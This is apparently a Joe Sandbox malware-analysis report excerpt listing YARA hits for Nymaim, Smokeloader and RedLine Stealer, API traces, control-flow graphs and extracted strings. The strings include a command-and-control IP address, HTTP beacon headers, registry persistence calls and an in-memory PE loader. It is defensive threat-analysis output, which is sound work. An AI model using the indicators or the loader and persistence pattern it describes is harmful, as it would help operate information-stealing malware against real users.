                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1671985450.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false


                      Execution Graph

                      Execution Coverage:1.6%
                      Dynamic/Decrypted Code Coverage:5.4%
                      Signature Coverage:3.6%
                      Total number of Nodes:557
                      Total number of Limit Nodes:4
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?,DE4EB787,74DF0F00,00000000), ref: 00403DAA
                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                      • Sleep.KERNEL32(000003E8), ref: 00403F42
                      • __Init_thread_footer.LIBCMT ref: 00404517
                      • __Init_thread_footer.LIBCMT ref: 004046DD
                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                      • __Init_thread_footer.LIBCMT ref: 00404975
                      • __Init_thread_footer.LIBCMT ref: 00404BDE
                      • CoInitialize.OLE32(00000000), ref: 00404C5F
                      • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,DE4EB787), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                      • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                      • __Init_thread_footer.LIBCMT ref: 00404046
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                        • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                        • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                      • __Init_thread_footer.LIBCMT ref: 00404222
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                      • API String ID: 995133137-3578497191
                      • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                      • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,DE4EB787), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • Sleep.KERNEL32(000007D0), ref: 00405755
                      • Sleep.KERNEL32(000007D0), ref: 0040576F
                      • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                      • API String ID: 606935701-1501174972
                      • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                      • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1318 47a8464-47a847d 1319 47a847f-47a8481 1318->1319 1320 47a8488-47a8494 CreateToolhelp32Snapshot 1319->1320 1321 47a8483 1319->1321 1322 47a8496-47a849c 1320->1322 1323 47a84a4-47a84b1 Module32First 1320->1323 1321->1320 1322->1323 1330 47a849e-47a84a2 1322->1330 1324 47a84ba-47a84c2 1323->1324 1325 47a84b3-47a84b4 call 47a8123 1323->1325 1328 47a84b9 1325->1328 1328->1324 1330->1319 1330->1323
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 047A848C
                      • Module32First.KERNEL32(00000000,00000224), ref: 047A84AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFirstModule32SnapshotToolhelp32
                      • String ID:
                      • API String ID: 3833638111-0
                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction ID: 5dc7c83e20f23cc8e33816e0c8d348b8f7c13a94c26d9eda38bb56e96fa06e4a
                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction Fuzzy Hash: 8DF09635100711AFE7203FF59C8CB6EB6E8BF89725F110728E642952C0DB74F8554AA2

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1334 4087e0-408807 call 402460 * 2 call 405a50 1340 40880c-408816 call 4106ab 1334->1340
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: mixtwo$nosub
                      • API String ID: 3472027048-187875987
                      • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                      • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF

                      Control-flow Graph

                      APIs
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                        • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                      Strings
                      • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                      • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                      • text, xrefs: 00401B8F
                      • http://, xrefs: 00401EF4, 004021D3
                      • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                      • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                      • GET, xrefs: 004020E7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                      • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                      • API String ID: 2146599340-4172842843
                      • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                      • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0495024D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: cess$kernel32.dll
                      • API String ID: 4275171209-1230238691
                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction ID: e66cd634b46ade7cedf94661ff97dd16c42cd12a520f0e41bcf94499f40e58ad
                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction Fuzzy Hash: F2526D74A01229DFDB64CF58C985BACBBB5BF09304F1480E9E94DA7361DB30AA85DF14

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,DE4EB787), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                      • API String ID: 2563648476-311857291
                      • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                      • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1274 401e50-401e9e 1275 401ea0-401ea5 1274->1275 1275->1275 1276 401ea7-402179 call 402760 * 2 call 40aff0 call 40d0f0 InternetOpenA 1275->1276 1289 4021a3-4021c0 call 409a17 1276->1289 1290 40217b-402187 1276->1290 1292 402199-4021a0 call 409b7c 1290->1292 1293 402189-402197 1290->1293 1292->1289 1293->1292 1295 4021c8-4021f9 call 40cfef call 401e50 1293->1295
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: http://
                      • API String ID: 0-1121587658
                      • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                      • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1303 413cb9-413cc5 1304 413cf7-413d02 call 40d0dd 1303->1304 1305 413cc7-413cc9 1303->1305 1312 413d04-413d06 1304->1312 1307 413ce2-413cf3 RtlAllocateHeap 1305->1307 1308 413ccb-413ccc 1305->1308 1309 413cf5 1307->1309 1310 413cce-413cd5 call 412473 1307->1310 1308->1307 1309->1312 1310->1304 1315 413cd7-413ce0 call 4116b2 1310->1315 1315->1304 1315->1307
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: 5(@
                      • API String ID: 1279760036-4133491027
                      • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                      • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1331 4950e0f-4950e24 SetErrorMode * 2 1332 4950e26 1331->1332 1333 4950e2b-4950e2c 1331->1333 1332->1333
                      APIs
                      • SetErrorMode.KERNEL32(00000400,?,?,04950223,?,?), ref: 04950E19
                      • SetErrorMode.KERNEL32(00000000,?,?,04950223,?,?), ref: 04950E1E
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction ID: 43bafc9d913032364e66eb76556220aff11c3ffb76751d3d3a00cc89f2821bfa
                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction Fuzzy Hash: 3ED0123114512877D7002A94DC0DBCD7B1CDF05B62F108021FB0DD9080C770954047E5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1343 607aea-607b0a LoadLibraryA 1344 60c7e7-60c80d 1343->1344
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_603000_file.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 51851aa3a336c3ac2ab989890fae12c575d505a9d2de42025f122c80c4f556f2
                      • Instruction ID: 259b1a01c972f1a5c0ebe0a0c9453b647dbbf3263b3e1e5863d7ea2b7eaa7efe
                      • Opcode Fuzzy Hash: 51851aa3a336c3ac2ab989890fae12c575d505a9d2de42025f122c80c4f556f2
                      • Instruction Fuzzy Hash: 4FE0BDB548D719CFC7183F65C08807EFBF1AF11710F220A0ED5D28A594D77A0496EA0B

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1347 703c5f-703c83 VirtualProtect call 703c8b 1349 703c88 1347->1349
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_703000_file.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 4537dc18018ddb924ebd27ad6171b2ccc8bce3bbce204e4e2cc4041153adfb3f
                      • Instruction ID: ebc8aa0ae85d02123b784d46dc44141e8ad5dfe9c1507a9d98ac7f5dde308e0b
                      • Opcode Fuzzy Hash: 4537dc18018ddb924ebd27ad6171b2ccc8bce3bbce204e4e2cc4041153adfb3f
                      • Instruction Fuzzy Hash: FAD0C73140476D97DF05DF34858568F3765DF55310F218619A401579868676AE218B9C

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1350 47a8123-47a815d call 47a8436 1353 47a81ab 1350->1353 1354 47a815f-47a8192 VirtualAlloc call 47a81b0 1350->1354 1353->1353 1356 47a8197-47a81a9 1354->1356 1356->1353
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 047A8174
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction ID: b7ee4685b3560880c722a87af921d37dd854d14b97f1e34b5c59a131e3db5e88
                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction Fuzzy Hash: B5113C79A00208EFDB01DF98C989E98BBF5EF08350F058094F9489B361D371EA50DF81

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1357 705981-705a5d Sleep 1361 705a63 1357->1361 1362 705a5e call 705a66 1357->1362 1362->1361
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_703000_file.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: af38090a1ef892c946439fcbdc65869c2570ee2d6009b7d395b5e6b7fe7fe5d2
                      • Instruction ID: bf3dbcbb2bbb2b520a67328dfa65eac8b1462156b1de81fe2e6108f803bb274d
                      • Opcode Fuzzy Hash: af38090a1ef892c946439fcbdc65869c2570ee2d6009b7d395b5e6b7fe7fe5d2
                      • Instruction Fuzzy Hash: FA01DDB594820ECBDF04CF6AC48978F7BA5FF48300F50421AE94586E80C7B61D648F5D

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1363 7059ce-7059d4 Sleep 1366 705a29-705a5d 1363->1366 1367 705a63 1366->1367 1368 705a5e call 705a66 1366->1368 1368->1367
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_703000_file.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 0a3d81d40254831e356f5042eca42dd7c147442d8b42812467424555651f0bfd
                      • Instruction ID: 8e77d9cc3632a8e49e27bba551ecfdcce17c6f97ac94c610b763a5ab4cbb2934
                      • Opcode Fuzzy Hash: 0a3d81d40254831e356f5042eca42dd7c147442d8b42812467424555651f0bfd
                      • Instruction Fuzzy Hash: A0F0587554860ECFDB04CF68C48939F7BA0EF09300F644258E84683E81C7B61D24CE1E
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04954011
                      • Sleep.KERNEL32(000003E8), ref: 049541A9
                      • __Init_thread_footer.LIBCMT ref: 0495477E
                      • __Init_thread_footer.LIBCMT ref: 04954944
                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954B4E
                      • __Init_thread_footer.LIBCMT ref: 04954BDC
                      • __Init_thread_footer.LIBCMT ref: 04954E45
                      • CoInitialize.OLE32(00000000), ref: 04954EC6
                      • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04954EE1
                      • __Init_thread_footer.LIBCMT ref: 04955344
                      • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                      • __Init_thread_footer.LIBCMT ref: 04955652
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954F4F
                        • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                        • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                      • __Init_thread_footer.LIBCMT ref: 049542AD
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        • Part of subcall function 04952487: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 049524BD
                        • Part of subcall function 04952487: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 049524DE
                        • Part of subcall function 04952487: CloseHandle.KERNEL32(00000000), ref: 049524E5
                      • __Init_thread_footer.LIBCMT ref: 04954489
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$O@K\$Y@BA$ZK\.$rmBK
                      • API String ID: 529012138-2214808123
                      • Opcode ID: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                      • Instruction ID: 175f9b9b8e5e0ed6967ab2b4efcc17d5098a5b891e341e984bef65d0d0da54a3
                      • Opcode Fuzzy Hash: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                      • Instruction Fuzzy Hash: 52F2D1B0D042549FEB24CF24DC48BADBBB4AF44308F6442E8E8096B2A1D775BAC5CF55
                      APIs
                      • SetLastError.KERNEL32(0000000D), ref: 00402F02
                      • SetLastError.KERNEL32(000000C1), ref: 00402F44
                      Strings
                      • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                      • DOS header size is not valid!, xrefs: 00402F71
                      • ERROR_OUTOFMEMORY!, xrefs: 00403062
                      • DOS header is not valid!, xrefs: 00402F32
                      • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                      • Size is not valid!, xrefs: 00402F08
                      • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                      • Section alignment invalid!, xrefs: 00402FC7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast
                      • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                      • API String ID: 1452528299-2436911586
                      • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                      • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
